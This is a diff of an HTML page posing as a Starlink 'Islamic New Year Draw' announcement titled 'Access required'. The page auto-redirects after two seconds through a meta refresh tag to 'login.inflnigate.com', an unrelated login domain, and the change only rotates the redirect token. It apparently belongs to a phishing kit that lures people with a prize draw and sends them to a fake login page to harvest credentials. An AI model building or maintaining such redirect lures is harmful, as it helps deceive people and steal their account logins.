--- a/starlinkme/announcements/Islamic-New-Year-Draw/index.html
+++ b/starlinkme/announcements/Islamic-New-Year-Draw/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
     <meta charset="UTF-8">
-<meta http-equiv="refresh" content="2;url=https://login.inflnigate.com/zxUyutvd">
+<meta http-equiv="refresh" content="2;url=https://login.inflnigate.com/xIEoQMrh">
     <title>Access required</title>
     <link rel="icon" href="favicon.ico" type="image/x-icon">
     <style>
